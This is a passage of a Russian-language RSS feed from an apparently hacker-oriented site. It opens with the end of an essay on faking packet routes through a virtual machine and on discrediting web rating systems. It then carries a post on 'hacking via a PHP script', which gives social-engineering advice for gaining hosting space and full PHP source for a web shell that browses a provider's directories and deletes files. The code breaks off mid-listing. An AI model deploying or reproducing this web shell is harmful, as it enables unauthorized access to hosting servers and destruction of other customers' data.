промежуточных хопа X1, X2. &lt;BR&gt;Задача: имитация соединения между компьютерами по маршруту &lt;BR&gt;B&lt;=&amp;gt;X1&lt;=&amp;gt;X2&lt;=&amp;gt;C. Решение: поскольку маршруты движения пакетов в &lt;BR&gt;сетях TCP/IP заранее никак не регламентирован, создать для &lt;BR&gt;компьютера C иллюзию движения пакетов по маршруту &lt;BR&gt;B&lt;=&amp;gt;X1&lt;=&amp;gt;A&lt;=&amp;gt;X2&lt;=&amp;gt;C. Сначала надо убедиться, что компьютер B &lt;BR&gt;находится в сети. Затем, виртуальная машина на компьютере A посылает &lt;BR&gt;пакет установления соединения на компьютер C такого вида, словно он &lt;BR&gt;прошел по маршруту B&lt;=&amp;gt;X1&lt;=&amp;gt;A. Все остальные пакеты до закрытия &lt;BR&gt;соединения будут двигаться по установленному маршруту A&lt;=&amp;gt;X2&lt;=&amp;gt;C и &lt;BR&gt;должны иметь такие параметры, словно они предварительно прошли по &lt;BR&gt;маршруту B&lt;=&amp;gt;X1&lt;=&amp;gt;A. Попытка проследить маршрут движения пакетов с &lt;BR&gt;компьютера C до компьютера B даст маршрут B&lt;=&amp;gt;X1&lt;=&amp;gt;X2&lt;=&amp;gt;C, поскольку &lt;BR&gt;это будет уже новое соединение. Необходимо добиться, чтобы &lt;BR&gt;виртуальная машина могла в необходимом для маскировки объеме &lt;BR&gt;имитировать ОС и броузер компьютера B. Так для компьютера C &lt;BR&gt;создается полная иллюзия работы с компьютером B и никакими &lt;BR&gt;средствами TCP/IP эту иллюзию нельзя развеять. Вот такой вот &lt;BR&gt;фокус-покус. &lt;BR&gt;&quot;Здравствуйте, девочки...&quot;&lt;BR&gt;Рейтинговым системам, в том виде, в каком они существуют в настоящее &lt;BR&gt;время, грозит полная дискредитация. И не моя в том вина, лишь &lt;BR&gt;пользуясь научным методом, я даю описание положения дел в этой &lt;BR&gt;сфере, и, основываясь на результатах анализа, делаю синтез &lt;BR&gt;возможного варианта развития событий. &lt;BR&gt;Удаление ресурса из рейтинга свидетельствует о низкой квалификации &lt;BR&gt;персонала, поскольку такой персонал либо не знает других методов &lt;BR&gt;борьбы с &quot;накруткой&quot;, либо ему проще ущемлять права других, чем &lt;BR&gt;работать своими мозгами. Это не добавляет доверия рейтинговым &lt;BR&gt;системам. И поскольку действия персонала могут быть обжалованы в &lt;BR&gt;Суде, то после двух-трех проигранных процессов (как и в случае с &lt;BR&gt;законом &quot;О защите прав потребителей&quot;) персоналы рейтинговых систем &lt;BR&gt;вообще прекратят удалять из списков участников рейтингов любые &lt;BR&gt;ресурсы. &lt;BR&gt;В результате, верхние строки рейтингов заполонят &quot;накрученные&quot; &lt;BR&gt;ресурсы. Хорошо, если как-то удастся изобличать в мошенничестве &lt;BR&gt;владельцев таких ресурсов. А если нет? Второе более вероятно, ибо &lt;BR&gt;любое сомнение всегда трактуется в пользу подозреваемого &lt;BR&gt;(обвиняемого). Следовательно, мошенники чаще всего будут оставаться &lt;BR&gt;безнаказанными, и будут все более активно пользоваться доверием к &lt;BR&gt;рейтинговым системам. Став невольными пособниками мошенников, &lt;BR&gt;рейтинговые системы только усугубят потерю доверия. &lt;BR&gt;Значительное снижение доверия приведет к снижению капитализации &lt;BR&gt;рейтинговых систем, поскольку в основе этого вида бизнеса лежит &lt;BR&gt;доверие к высокой квалификации и честности персонала. Как следствие, &lt;BR&gt;снизится доходность бизнеса. И начнется отток квалифицированного &lt;BR&gt;персонала. &lt;BR&gt;И круг замкнется. Значительное снижение доверия приведет к &lt;BR&gt;финансовым потерям, из-за чего возникнут сложности с наймом &lt;BR&gt;квалифицированного персонала, из-за чего еще больше снизится доверие &lt;BR&gt;бизнесу, из-за чего еще больше снизится доходность бизнеса, из-за &lt;BR&gt;чего еще сложнее станет наем квалифицированного персонала, и т.д. &lt;BR&gt;Это описание возможной схемы цепной реакции &quot;самоуничтожения&quot; &lt;BR&gt;рейтинговых систем. Остается только инициировать процесс... &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;Кто-то, прочитав последний абзац, скажет &quot;вот и ***дец, пришли&quot;, как &lt;BR&gt;тот одноглазый, который повел слепого в бордель через лес и выбил &lt;BR&gt;себе веткой последний глаз, а в ответ слышит радостное &lt;BR&gt;&quot;здравствуйте, девочки...&quot;... &lt;BR&gt;&lt;BR&gt;5 мая-14 июля 2002 года &lt;BR&gt;Urix &lt;BR&gt;&lt;BR&gt;P.S. У меня есть две новости. Я не вождь троглодитов, поэтому начну &lt;BR&gt;с хорошей. Прежде чем публиковать эту статью, я придумал, как надо &lt;BR&gt;юридически и технически правильно без Java-счетчиков подсчитывать &lt;BR&gt;рейтинги, поскольку, как и все честные люди, я заинтересован в &lt;BR&gt;существовании рейтинговых систем с высоким уровнем доверия. Плохая &lt;BR&gt;новость та, что хотя это и спасает от полной дискредитации &lt;BR&gt;рейтинговые системы, но не является абсолютной панацеей. &lt;BR&gt;18-20 октября 2002 го&lt;BR&gt;&lt;/P&gt;</content:encoded>
			<link>https://xakerd.ucoz.ru/news/2009-02-19-38</link>
			<dc:creator>xakerd</dc:creator>
			<guid>https://xakerd.ucoz.ru/news/2009-02-19-38</guid>
			<pubDate>Thu, 19 Feb 2009 05:46:30 GMT</pubDate>
		</item>
		<item>
			<title>Взлом через PHP-скрипт</title>
			<description>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/php-logo.jpg&quot;&gt;Данная атака на сервер проходит со 100% гарантией. Для успешной атаки взломщику необходимо дисковое пространство на сервере размером в 10 Kb (столько весит скрипт) и возможность запустить свой PHP скрипт. Далеко не секрет, что хакеры очень часто проникают в систему используя социнженерию, тоесть изначально подготавливают жертву, чтобы та им доверяла, получают от неё информацию и осуществляют взлом. Поэтому раздобыть на любом сервере небольшое дисковое пространство для хакера не проблема. В крайнем случае можно и купить себе домен на сервере провайдера или любой другой хостинговой компании, которую хакер собирается взломать. В большей части взлому подвержены бесплатные хостинговые компании и провайдеры, которые при регистрации доступа в интернет дают бесплатное место для размещение домашней странички пользователя с запуском собственных PHP скриптов. Идея реализации атаки заключается в том, чтобы залезть на жесткий диск провайдера и иметь возможность управлять...</description>
			<content:encoded>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/php-logo.jpg&quot;&gt;Данная атака на сервер проходит со 100% гарантией. Для успешной атаки взломщику необходимо дисковое пространство на сервере размером в 10 Kb (столько весит скрипт) и возможность запустить свой PHP скрипт. Далеко не секрет, что хакеры очень часто проникают в систему используя социнженерию, тоесть изначально подготавливают жертву, чтобы та им доверяла, получают от неё информацию и осуществляют взлом. Поэтому раздобыть на любом сервере небольшое дисковое пространство для хакера не проблема. В крайнем случае можно и купить себе домен на сервере провайдера или любой другой хостинговой компании, которую хакер собирается взломать. В большей части взлому подвержены бесплатные хостинговые компании и провайдеры, которые при регистрации доступа в интернет дают бесплатное место для размещение домашней странички пользователя с запуском собственных PHP скриптов. Идея реализации атаки заключается в том, чтобы залезть на жесткий диск провайдера и иметь возможность управлять файлами, тоесть удалять, просматривать, редактировать. Для этого нам придётся написать небольшой скрипт, который получит доступ к ресурсам сервера. Для начала определим какими функциями должен обладать скрипт: заложим в него функции удаления выбранных файлов, скрипт должен уметь просматривать картинки, открывать каталоги, выставлять права доступа к файлам, знать когда файл был создан в системе, когда файл был изменён, к какой группе относится файл и выставлять соответствующую иконку для удобства, переходить из каталога в каталог, указывать полные пути до файлов: &lt;BR&gt;&lt;?php //говорим что это PHP скрипт &lt;BR&gt;function cmp( $a, $b ) //обьявляем функции&lt;BR&gt;{ &lt;BR&gt;GLOBAL $sort; //сортируем полученные функции &lt;BR&gt;&lt;BR&gt;if( $a-&gt;inode == $b-&gt;inode ) &lt;BR&gt;return 0; &lt;BR&gt;&lt;BR&gt;switch( $sort ) //объявляем , что по каким функциям будет сортироваться &lt;BR&gt;{ &lt;BR&gt;case &quot;size&quot;: &lt;BR&gt;return ($a-&gt;size &gt; $b-&gt;size) ? -1 : 1; &lt;BR&gt;case &quot;type&quot;: &lt;BR&gt;return strcmp($a-&gt;type, $b-&gt;type); &lt;BR&gt;case &quot;view&quot;: &lt;BR&gt;return strcmp($a-&gt;view, $b-&gt;view); &lt;BR&gt;case &quot;atime&quot;: &lt;BR&gt;return ($a-&gt;atime &gt; $b-&gt;atime) ? -1 : 1; &lt;BR&gt;case &quot;ctime&quot;: &lt;BR&gt;return ($a-&gt;ctime &gt; $b-&gt;ctime) ? -1 : 1; &lt;BR&gt;case &quot;mtime&quot;: &lt;BR&gt;return ($a-&gt;mtime &gt; $b-&gt;mtime) ? -1 : 1; &lt;BR&gt;case &quot;group&quot;: &lt;BR&gt;return strcmp($a-&gt;group, $b-&gt;group); &lt;BR&gt;case &quot;inode&quot;: &lt;BR&gt;return ($a-&gt;inode &gt; $b-&gt;inode) ? -1 : 1; &lt;BR&gt;case &quot;owner&quot;: &lt;BR&gt;return strcmp($a-&gt;owner, $b-&gt;owner); &lt;BR&gt;case &quot;perms&quot;: &lt;BR&gt;return ($a-&gt;perms &gt; $b-&gt;perms) ? -1 : 1; &lt;BR&gt;case &quot;ext&quot;: &lt;BR&gt;return strcmp($a-&gt;ext, $b-&gt;ext); &lt;BR&gt;case &quot;name&quot;: &lt;BR&gt;default: &lt;BR&gt;return 1; &lt;BR&gt;} &lt;BR&gt;} &lt;BR&gt;&lt;BR&gt;function getIcons( $ext ) //объявляем функцию сопоставления иконки с типом файла &lt;BR&gt;{ &lt;BR&gt;switch( $ext ) &lt;BR&gt;{ &lt;BR&gt;case &quot;dir&quot;: &lt;BR&gt;$file = &quot;dir&quot;; &lt;BR&gt;break; &lt;BR&gt;case &quot;link&quot;: &lt;BR&gt;$file = &quot;link&quot;; &lt;BR&gt;break; &lt;BR&gt;case &quot;zip&quot;: &lt;BR&gt;case &quot;tgz&quot;: &lt;BR&gt;case &quot;gz&quot;: &lt;BR&gt;case &quot;Z&quot;: &lt;BR&gt;$file = &quot;compressed&quot;; &lt;BR&gt;break; &lt;BR&gt;case &quot;gif&quot;:&lt;BR&gt;case &quot;jpg&quot;: &lt;BR&gt;$file = &quot;image2&quot;; &lt;BR&gt;break; &lt;BR&gt;case &quot;dvi&quot;: &lt;BR&gt;$file = &quot;dvi&quot;; &lt;BR&gt;break; &lt;BR&gt;case &quot;&quot;: &lt;BR&gt;case &quot;exe&quot;: &lt;BR&gt;$file = &quot;binary&quot;; &lt;BR&gt;break; &lt;BR&gt;case &quot;sh&quot;: &lt;BR&gt;case &quot;php&quot;: &lt;BR&gt;case &quot;php3&quot;: &lt;BR&gt;case &quot;sql&quot;: &lt;BR&gt;case &quot;inc&quot;: &lt;BR&gt;case &quot;js&quot;: &lt;BR&gt;$file = &quot;script&quot;; &lt;BR&gt;break; &lt;BR&gt;case &quot;txt&quot;:&lt;BR&gt;$file = &quot;text&quot;;&lt;BR&gt;break; &lt;BR&gt;case &quot;html&quot;: &lt;BR&gt;case &quot;shtml&quot;: &lt;BR&gt;case &quot;phtml&quot;: &lt;BR&gt;$file = &quot;world1&quot;; &lt;BR&gt;break; &lt;BR&gt;default: &lt;BR&gt;$file = &quot;generic&quot;; &lt;BR&gt;break; &lt;BR&gt;} &lt;BR&gt;&lt;BR&gt;return $IMG=&quot;&lt;IMG SRC=&apos;icons/&quot;.$file.&quot;.gif&apos;&gt;&quot;; &lt;BR&gt;} &lt;BR&gt;&lt;BR&gt;class MyFile { //объявляем какие данные будут получены &lt;BR&gt;var $name; &lt;BR&gt;var $path; &lt;BR&gt;var $type; &lt;BR&gt;var $ext; &lt;BR&gt;var $stype; &lt;BR&gt;var $sfile; &lt;BR&gt;var $size; &lt;BR&gt;var $file; &lt;BR&gt;var $atime; &lt;BR&gt;var $ctime; &lt;BR&gt;var $mtime; &lt;BR&gt;var $group; &lt;BR&gt;var $inode; &lt;BR&gt;var $owner; &lt;BR&gt;var $perms; &lt;BR&gt;&lt;BR&gt;function set( $filename, $path ) &lt;BR&gt;{ &lt;BR&gt;GLOBAL $cd; //объявляем функции перехода по каталогам &lt;BR&gt;&lt;BR&gt;$this-&gt;name = $filename; &lt;BR&gt;$this-&gt;path = $path; &lt;BR&gt;$this-&gt;file = $this-&gt;path.&quot;/&quot;.$this-&gt;name; &lt;BR&gt;&lt;BR&gt;$this-&gt;type = filetype( $this-&gt;file ); &lt;BR&gt;$this-&gt;size = filesize( $this-&gt;file ); &lt;BR&gt;$this-&gt;atime = fileatime( $this-&gt;file ); &lt;BR&gt;$this-&gt;ctime = filectime( $this-&gt;file ); &lt;BR&gt;$this-&gt;mtime = filemtime( $this-&gt;file ); &lt;BR&gt;$this-&gt;group = filegroup( $this-&gt;file ); &lt;BR&gt;$this-&gt;inode = fileinode( $this-&gt;file ); &lt;BR&gt;$this-&gt;owner = fileowner( $this-&gt;file ); &lt;BR&gt;$this-&gt;perms = fileperms( $this-&gt;file ); &lt;BR&gt;&lt;BR&gt;switch( $this-&gt;type ) &lt;BR&gt;{ &lt;BR&gt;case &quot;link&quot;: &lt;BR&gt;$this-&gt;sfile = readlink( $this-&gt;file ); &lt;BR&gt;$this-&gt;stype = filetype( $this-&gt;sfile ); &lt;BR&gt;$this-&gt;ext = &quot;link&quot;; &lt;BR&gt;break; &lt;BR&gt;case &quot;file&quot;: &lt;BR&gt;$list = explode( &quot;.&quot;, $this-&gt;name ); &lt;BR&gt;$nb = sizeof( $list ); &lt;BR&gt;if( $nb &gt; 0 ) &lt;BR&gt;$this-&gt;stype = $list[$nb-1]; &lt;BR&gt;else &lt;BR&gt;$this-&gt;stype = &quot;???&quot;; &lt;BR&gt;&lt;BR&gt;$this-&gt;ext = $this-&gt;stype; &lt;BR&gt;&lt;BR&gt;switch( $this-&gt;stype ) &lt;BR&gt;{ &lt;BR&gt;case &quot;gif&quot;: &lt;BR&gt;case &quot;GIF&quot;: &lt;BR&gt;case &quot;jpg&quot;: &lt;BR&gt;case &quot;JPG&quot;: &lt;BR&gt;if( isset( $cd ) ) &lt;BR&gt;$pwd = $cd.&quot;/&quot;; &lt;BR&gt;else &lt;BR&gt;$pwd = &quot;&quot;; &lt;BR&gt;&lt;BR&gt;$this-&gt;sfile = &quot;&lt;IMG SRC=&apos;&quot;.$this-&gt;file.&quot;&apos;&gt;&quot;; &lt;BR&gt;break; &lt;BR&gt;default: &lt;BR&gt;$this-&gt;sfile = $this-&gt;stype; &lt;BR&gt;break; &lt;BR&gt;} &lt;BR&gt;break;&lt;BR&gt;default: &lt;BR&gt;$this-&gt;stype = &quot;&quot;; &lt;BR&gt;$this-&gt;sfile = &quot;&quot;; &lt;BR&gt;$this-&gt;ext = $this-&gt;type; &lt;BR&gt;break; &lt;BR&gt;} &lt;BR&gt;} &lt;BR&gt;&lt;BR&gt;function formatSize() &lt;BR&gt;{ &lt;BR&gt;return number_format( $this-&gt;size, 0, &quot;.&quot;, &quot; &quot;); &lt;BR&gt;} &lt;BR&gt;} &lt;BR&gt;&lt;BR&gt;function genUrl( $ref, $args, $key = &quot;&quot;, $val = &quot;&quot; )&lt;BR&gt;&lt;BR&gt;{ &lt;BR&gt;$valist = &quot;&quot;; &lt;BR&gt;&lt;BR&gt;reset( $args ); &lt;BR&gt;&lt;BR&gt;if( $key != &quot;&quot; ) &lt;BR&gt;$args[ &quot;$key&quot; ] = $val; &lt;BR&gt;&lt;BR&gt;if( !is_array( $args ) ) &lt;BR&gt;return $ref; &lt;BR&gt;&lt;BR&gt;while( list( $key, $val ) = each( $args ) ) &lt;BR&gt;{ &lt;BR&gt;if( $val == &quot;&quot; ) &lt;BR&gt;continue; &lt;BR&gt;&lt;BR&gt;if( $valist == &quot;&quot; ) &lt;BR&gt;$valist .= &quot;?&quot;; &lt;BR&gt;else &lt;BR&gt;$valist .= &quot;&amp;&quot;; &lt;BR&gt;&lt;BR&gt;$valist .= $key.&quot;=&quot;.$val; &lt;BR&gt;} &lt;BR&gt;return $ref.$valist; &lt;BR&gt;} &lt;BR&gt;&lt;BR&gt;function updir( $path ) &lt;BR&gt;{ &lt;BR&gt;$last = strrchr( $path, &quot;/&quot; ); &lt;BR&gt;$n1 = strlen( $last ); &lt;BR&gt;$n2 = strlen( $path ); &lt;BR&gt;return substr( $path, 0, $n2-$n1 ); &lt;BR&gt;} &lt;BR&gt;&lt;BR&gt;$ref = &quot;dir.php&quot;; &lt;BR&gt;&lt;BR&gt;if( isset( $cd ) ) &lt;BR&gt;{ &lt;BR&gt;$path = $cd; &lt;BR&gt;//$lcd = &quot;?cd=$cd&apos;&quot;; &lt;BR&gt;$args[ &quot;cd&quot; ] = $cd; &lt;BR&gt;} &lt;BR&gt;else &lt;BR&gt;{ &lt;BR&gt;$path = &quot;.&quot;; &lt;BR&gt;//$lcd = &quot;&quot;; &lt;BR&gt;$args[ &quot;cd&quot; ] = &quot;&quot;; &lt;BR&gt;} &lt;BR&gt;&lt;BR&gt;if( isset( $nb ) ) &lt;BR&gt;{ &lt;BR&gt;for( $i = 0; $i &lt; $nb; $i++ ) &lt;BR&gt;{ &lt;BR&gt;$var = &quot;id_$i&quot;; &lt;BR&gt;if( isset( $$var ) )&lt;BR&gt;{ &lt;BR&gt;$file = $path.&quot;/&quot;.$$var; &lt;BR&gt;if( is_file( $file ) || is_link( $file ) ) &lt;BR&gt;{ &lt;BR&gt;if( unlink( $file ) ) &lt;BR&gt;echo &quot;&lt;BR&gt;&lt;b&gt;$file&lt;/b&gt; успешно удалён&amp;#92;n&quot;; //сообщение об успешном удалении файла &lt;BR&gt;else &lt;BR&gt;echo &quot;&lt;BR&gt;Не могу удалить выставите права доступа &lt;b&gt;$file&lt;/b&gt;&amp;#92;n&quot;; //сообщение о невозможности удалить файл который доступен только для чтения &lt;BR&gt;} &lt;BR&gt;elseif( is_dir( $file ) ) &lt;BR&gt;{ &lt;BR&gt;if( rmdir( $file ) ) &lt;BR&gt;echo &quot;&lt;BR&gt;&lt;b&gt;$file&lt;/b&gt; успешно удалён&amp;#92;n&quot;; //сообщение об успешном удалении &lt;BR&gt;else &lt;BR&gt;echo &quot;&lt;BR&gt;файл недоступен для удаления&lt;b&gt;$file&lt;/b&gt;&amp;#92;n&quot;; //сообщение о невозможности удалить файл &lt;BR&gt;} &lt;BR&gt;} &lt;BR&gt;} &lt;BR&gt;} &lt;BR&gt;&lt;BR&gt;$step = 100; &lt;BR&gt;&lt;BR&gt;if( !isset( $sort ) ) &lt;BR&gt;$sort = &quot;name&quot;; &lt;BR&gt;else &lt;BR&gt;$args[ &quot;sort&quot; ] = $sort; &lt;BR&gt;&lt;BR&gt;if( !isset( $from ) ) &lt;BR&gt;$from = 0; &lt;BR&gt;else &lt;BR&gt;$args[ &quot;from&quot; ] = $from; &lt;BR&gt;&lt;BR&gt;if( !isset( $to ) ) &lt;BR&gt;$to = $from + $step; &lt;BR&gt;&lt;BR&gt;$d = dir($path); &lt;BR&gt;echo &quot;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;br&gt;&lt;a href=$ref &gt;Вернуться в начало&lt;/a&gt;&amp;#92;n&quot;; //ссылка на возврат в домашнею директорию скрипта &lt;BR&gt;$updir = updir($d-&gt;path); &lt;BR&gt;if( $updir != &quot;.&quot; ) &lt;BR&gt;echo &quot;&lt;br&gt;Подняться на директорию вверх; &lt;a href=$ref?cd=$updir&gt;$updir&lt;/a&gt;&amp;#92;n&quot;; //ссылка на директорию вверх &lt;BR&gt;echo &quot;&lt;br&gt;Открыть директорию: &lt;a href=$ref?cd=&quot;.$d-&gt;path.&quot;/..&gt;..&lt;/a&gt;&amp;#92;n&quot;; //обновление текущей директории &lt;BR&gt;echo &quot;&lt;br&gt;Текущая директория: &lt;b&gt;&quot;.$d-&gt;path.&quot;&lt;/b&gt;&amp;#92;n&quot;; //показываем путь до директории и файлов, которые в ней находятся &lt;BR&gt;&lt;BR&gt;$n = 0; &lt;BR&gt;while( $entry=$d-&gt;read() ) &lt;BR&gt;{ &lt;BR&gt;$lFiles[ $n ] = new MyFile; &lt;BR&gt;$lFiles[ $n ]-&gt;set( $entry, $path ); &lt;BR&gt;$n++; &lt;BR&gt;} &lt;BR&gt;&lt;BR&gt;$d-&gt;close(); //создаём HTML форму управления функциями &lt;BR&gt;echo &quot;&lt;FORM NAME=&apos;del&apos; METHOD=&apos;post&apos; ACTION=&apos;&quot;.genUrl( $ref, $args ).&quot;&apos;&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TABLE BORDER=1&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TR&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;D&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;//echo &quot;&lt;TH&gt;&lt;a href=&apos;&quot;.genUrl( $ref, $args, &quot;sort&quot;, &quot;type&quot; ).&quot;&apos;&gt;Type&lt;/a&gt;&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;&lt;a href=&apos;&quot;.genUrl( $ref, $args, &quot;sort&quot;, &quot;name&quot; ).&quot;&apos;&gt;Имя&lt;/a&gt;&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;&lt;a href=&apos;&quot;.genUrl( $ref, $args, &quot;sort&quot;, &quot;size&quot; ).&quot;&apos;&gt;Размер&lt;/a&gt;&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;&lt;a href=&apos;&quot;.genUrl( $ref, $args, &quot;sort&quot;, &quot;ext&quot; ).&quot;&apos;&gt;Класс&lt;/a&gt;&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;&lt;a href=&apos;&quot;.genUrl( $ref, $args, &quot;sort&quot;, &quot;atime&quot; ).&quot;&apos;&gt;В системе&lt;/a&gt;&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;&lt;a href=&apos;&quot;.genUrl( $ref, $args, &quot;sort&quot;, &quot;ctime&quot; ).&quot;&apos;&gt;Создан&lt;/a&gt;&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;&lt;a href=&apos;&quot;.genUrl( $ref, $args, &quot;sort&quot;, &quot;mtime&quot; ).&quot;&apos;&gt;Изменён&lt;/a&gt;&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;&lt;a href=&apos;&quot;.genUrl( $ref, $args, &quot;sort&quot;, &quot;perms&quot; ).&quot;&apos;&gt;Размер&lt;/a&gt;&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;&lt;a href=&apos;&quot;.genUrl( $ref, $args, &quot;sort&quot;, &quot;group&quot; ).&quot;&apos;&gt;Группа&lt;/a&gt;&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;&lt;a href=&apos;&quot;.genUrl( $ref, $args, &quot;sort&quot;, &quot;owner&quot; ).&quot;&apos;&gt;ow&lt;/a&gt;&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;&lt;a href=&apos;&quot;.genUrl( $ref, $args, &quot;sort&quot;, &quot;inode&quot; ).&quot;&apos;&gt;in&lt;/a&gt;&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TH&gt;Показ&lt;/TH&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;/TR&gt;&amp;#92;n&quot;; &lt;BR&gt;&lt;BR&gt;@usort( $lFiles, cmp ); &lt;BR&gt;&lt;BR&gt;for( $i = 0; $i &lt; $n; $i++ ) &lt;BR&gt;{ &lt;BR&gt;if( ( $i &lt; $from ) || ( $i &gt;= $to ) ) &lt;BR&gt;continue; &lt;BR&gt;&lt;BR&gt;$k = $i; &lt;BR&gt;echo &quot;&lt;TR&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TD&gt;&lt;INPUT TYPE=&apos;checkbox&apos; NAME=&apos;id_$k&apos; VALUE=&apos;&quot;. &lt;BR&gt;$lFiles[ $k ]-&gt;name &lt;BR&gt;.&quot;&apos;&gt;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;&lt;BR&gt;$IMG=getIcons( $lFiles[ $k ]-&gt;ext ); &lt;BR&gt;&lt;BR&gt;$dform = &quot;M j y H:i&quot;; &lt;BR&gt;// echo &quot;&lt;TD ALIGN=CENTER &gt;&quot;.$lFiles[ $k ]-&gt;type.&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TD&gt;$IMG&quot;.$lFiles[ $k ]-&gt;name.&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TD ALIGN=RIGHT &gt;&quot;.$lFiles[ $k ]-&gt;formatSize().&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TD&gt;&quot;.$lFiles[ $k ]-&gt;ext .&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TD&gt;&quot;.date( $dform, $lFiles[ $k ]-&gt;atime ).&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TD&gt;&quot;.date( $dform, $lFiles[ $k ]-&gt;ctime ).&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TD&gt;&quot;.date( $dform, $lFiles[ $k ]-&gt;mtime ).&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TD&gt;&quot;.$lFiles[ $k ]-&gt;perms.&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TD&gt;&quot;.$lFiles[ $k ]-&gt;group.&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TD&gt;&quot;.$lFiles[ $k ]-&gt;owner.&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;TD&gt;&quot;.$lFiles[ $k ]-&gt;inode.&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;&lt;BR&gt;switch( $lFiles[ $k ]-&gt;type ) &lt;BR&gt;{ &lt;BR&gt;case &quot;link&quot;: &lt;BR&gt;if( $lFiles[ $k ]-&gt;stype == &quot;dir&quot; ) &lt;BR&gt;{ &lt;BR&gt;$tcd = $lFiles[ $k ]-&gt;path.&quot;/&quot;.$lFiles[ $k ]-&gt;name; &lt;BR&gt;echo &quot;&lt;TD&gt;&lt;a href=&apos;&quot;. &lt;BR&gt;genUrl( $ref, $args, &quot;cd&quot;, $tcd ).&quot;&apos;&gt;&quot;. &lt;BR&gt;$lFiles[ $k ]-&gt;sfile.&quot;&lt;/a&gt;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;} &lt;BR&gt;else &lt;BR&gt;echo &quot;&lt;TD&gt;&quot;.$lFiles[ $k ]-&gt;sfile.&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;break; &lt;BR&gt;case &quot;dir&quot;:&lt;BR&gt;$tcd = $lFiles[ $k ]-&gt;path.&quot;/&quot;.$lFiles[ $k ]-&gt;name; &lt;BR&gt;echo &quot;&lt;TD&gt;&lt;a href=&apos;&quot;. &lt;BR&gt;genUrl( $ref, $args, &quot;cd&quot;, $tcd ).&quot;&apos;&gt;&quot;. &lt;BR&gt;$lFiles[ $k ]-&gt;name.&quot;&lt;/a&gt;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;break; &lt;BR&gt;case &quot;file&quot;: &lt;BR&gt;echo &quot;&lt;TD&gt;&quot;.$lFiles[ $k ]-&gt;sfile.&quot;&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;break; &lt;BR&gt;default: &lt;BR&gt;echo &quot;&lt;TD&gt;NO&lt;/TD&gt;&amp;#92;n&quot;; &lt;BR&gt;break; &lt;BR&gt;} &lt;BR&gt;echo &quot;&lt;/TR&gt;&amp;#92;n&quot;; &lt;BR&gt;} &lt;BR&gt;&lt;BR&gt;echo &quot;&lt;/TABLE&gt;&amp;#92;n&quot;; &lt;BR&gt;&lt;BR&gt;$from = $from - $step; &lt;BR&gt;if( isset( $cd ) ) &lt;BR&gt;{ &lt;BR&gt;echo &quot;&lt;INPUT TYPE=&apos;hidden&apos; NAME=&apos;cd&apos; VALUE=&apos;$cd&apos;&gt;&amp;#92;n&quot;; &lt;BR&gt;} &lt;BR&gt;echo &quot;&lt;INPUT TYPE=&apos;hidden&apos; NAME=&apos;nb&apos; VALUE=&apos;$n&apos;&gt;&amp;#92;n&quot;; &lt;BR&gt;&lt;BR&gt;//echo &quot;&lt;br&gt;from=$from;to=$to;n=$n&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;br&gt;&amp;#92;n&quot;; &lt;BR&gt;if( $from &gt;= 0 ) &lt;BR&gt;{ &lt;BR&gt;echo &quot;&lt;a href=&apos;&quot;. &lt;BR&gt;genUrl( $ref, $args, &quot;from&quot;, $from ).&quot;&apos; &gt;Предыдущий&lt;/a&gt;/&amp;#92;n&quot;; &lt;BR&gt;} &lt;BR&gt;if( $to &lt;= $n ) &lt;BR&gt;{ &lt;BR&gt;echo &quot;&lt;a href=&apos;&quot;. &lt;BR&gt;genUrl( $ref, $args, &quot;from&quot;, $to ).&quot;&apos; &gt;Далее&lt;/a&gt; &amp;#92;n&quot;; &lt;BR&gt;} &lt;BR&gt;echo &quot;&lt;br&gt;&amp;#92;n&quot;; &lt;BR&gt;echo 